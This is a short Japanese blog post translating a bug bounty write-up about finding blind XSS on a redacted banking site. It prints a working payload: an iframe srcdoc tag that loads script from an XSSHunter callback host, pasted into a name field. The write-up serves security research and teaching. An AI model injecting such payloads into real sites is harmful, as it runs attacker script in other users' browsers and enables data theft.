Shikata Ga Nai

Private? There is no such things.

Get Blind XSS within 5 Minutes — $100を訳してみた

Bug Bounty

Hello there, ('ω')ノ

 

5 分以内にブラインド XSS を取得を。

 

脆弱性

 ブラインド XSS

 

記事:

 https://infosecwriteups.com/get-blind-xss-within-5-minutes-100-9718bd056570

 

今回は、銀行サイトで Blind XSS を見つけた方法について。

バグ報奨金プログラムを探していたときに redacted.com を見つけ。

有効な提出があった場合、redacted.com は CVSS に従って報奨金を授与し。

だから、それを試してみることに。

 

ブラインド XSS とは、クロスサイト スクリプティング (XSS) の一種であり。

攻撃者が Web ページに一連の悪意のあるペイロードを「盲目的に」展開し。

それらを永続的な状態 (データベースやログ ファイルなど) に。

保存する可能性があり。

 

XSSHunter ペイロード

 <iframe/srcdoc=”<script/src=//narayananm.xss.ht></script>”>

をすばやくコピーし、名前フィールドに貼り付け。

 

https://xsshunter.com/

 

数分後、以下のメールが届いて。

 

 

ペイロードが実行されて。

 

ヒント:

 常にすべての入力フィールドを確認して。

 

Best regards, (^^ゞ